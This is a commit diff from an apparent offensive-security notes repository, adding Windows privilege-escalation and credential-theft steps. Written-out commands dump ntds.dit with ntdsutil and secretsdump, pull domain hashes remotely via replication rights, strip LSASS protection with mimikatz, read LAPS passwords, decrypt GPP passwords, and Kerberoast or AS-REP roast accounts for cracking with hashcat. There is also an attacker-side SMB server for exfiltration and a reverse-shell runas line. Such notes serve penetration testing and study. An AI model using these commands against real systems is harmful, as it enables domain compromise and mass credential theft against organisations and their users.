whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2022-09-03 16:24:01 +02:00
parent 9a18fefd36
commit cb7800d75c
2 changed files with 124 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
exfiltration/windows/smb_connection.md
View File

@ -1,6 +1,7 @@
# Connect to Attacker SMB
## Attacker
* Impacket smbserver on attacker
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>

127
post exploitation/priv_esc/docs/windows/windows_priv_esc.md
View File

@ -65,12 +65,22 @@ reg query HKCU /f password /t REG_SZ /s
### AD Credentials
* Check AD's NTDS, SYSVOL
* Check user description of AD users
* Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain)
```sh
Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description
```
#### NTDS
* Check user description of AD users
* NTDS consists of three tables
* Schema
* Link
* Data type
* Located under `C:\Windows\NTDS`
* File is locked by AD at runtime
* A System Bootkey is need to dump the NTDS
## Exploit
* __Use found credentials__
@ -104,6 +114,7 @@ runas /savecred /user:<domain\user> reverse_shell.exe
### accesschk64 Permissions
* Check access to files and folders
```sh
accesschk64 -wvu "file.exe"
@ -298,6 +309,7 @@ copy cmd.exe utilman.exe
* Log out, on the Login screen click on `Ease of Access`
#### SeImpersonate / SeAssignPrimaryToken
* It is a rouge potato
* Execute process as another user
* Service accounts operate through impersonation
@ -335,16 +347,19 @@ sekurlsa::logonpasswords
### LSASS Protection
* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under
__The bypass is needed most of the time in order to dump passwords__
* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `0` under
```sh
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
```
* Alternatively use mimikatz
* Alternatively, use mimikatz
```sh
privilege::debug
!+
!processprotect /process:lsass.exe /remove
```
* `+!` calls `mimidrv.sys`, __therefore mimikatz has to be executed inside the same directory the this file lies__
### Windows Credential Manager
@ -367,3 +382,107 @@ Get-WebCredentials
privilege::debug
sekurlsa::credman
```
### Ntdsutil
* If administrative permissions on the DC have been gained this can be done
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
#### Locally extracting ntds.dit
* This can be done to gather the system boot key
* No AD credentials are needed
* Three files are needed
* C:\Windows\NTDS\ntds.dit
* C:\Windows\System32\config\SYSTEM
* C:\Windows\System32\config\SECURITY
* Locally dumping all three needed file is done via
```sh
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q"
```
* Use `secretsdump` to extract `ntds.dit`
```sh
secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
```
#### Remotely dumping ntds
* Needs the following AD credentials
* Replicating Directory Changes
* Replicating Directory Changes All
* Replicating Directory Changes in Filtered Set
* Mimikatz or impacket can be used to gain credentials
* Impacket's secretsdump.py via
```sh
secretsdump.py -just-dc <domain>/<AD_Admin_User>@$DC_IP
secretsdump.py -just-dc-ntlm <domain>/<AD_Admin_User>@$DC_IP
```
### Local Administration Password Solution (LAPS)
* This is possible if the user which credentials we posses is member of the group to make password changes
* Replaces GPP, see below
* There are two interesting attributes
* __ms-mcs-AdmPwd__ contains plain text password of the local Administrator
* __ms-mcs-AdmPwdExpirationTime__ contains the expiration date of the admin password
* __admpwd.dll__ is used to update the password inside __ms-mcs-AdmPwd__
* If LAPS is enabled the dll can be found in `C:\Program Files\LAPS\CSE`
* List the cmdlets for LAPS
```sh
Get-Command *AdmPwd*
```
* Find the Organisational Unit with extended rights and take a look at the group under `ExtendedRightsHolder` in the output
```sh
Find-AdmPwdExtendedRights -Identity <OU>
```
* Enumerate which hosts have LAPS enabled
* Impersonate the user and execute the following which displays the password
```sh
Get-AdmPwdPassword -ComputerName <targethost>
```
* Use the property name displayed under `ExtendedRightsHolder` to enumerate groups and their users
```sh
net groups <ExtendedRightsHolder>
net user <GroupMemberUsername>
```
#### Group Policy Preferences
* Provisions administrational groups through the domain via SYSVOL
* Distribution is done through XML files on SYSVOL. These contain a password encrypted with [the published private key](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN)
* Use [Powersploit's Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) to decrypt it
### Kerberoasting
* Inital (low level) credentials are needed
* __Service Principal Name (SPN)__ account must be known, e.g. from web IIS user or SQL users
```sh
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
```
* Take a look at `Name` in the output and use it to query a TGS ticket
```sh
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
```
* Crack the kerberos hash
```sh
hashcat -m 13100 -a0 hash.txt --wordlist <wordlist>
```
### AS-REP Roasting
* `Do not require Kerberos pre-authentication` must be set on the AD user's account login settings. A password is used instead
* A list of potential users with this configured setting should be gathered
```sh
GetNPUsers.py -dc-ip $DC_IP <domain>/ -usersfile users.txt
```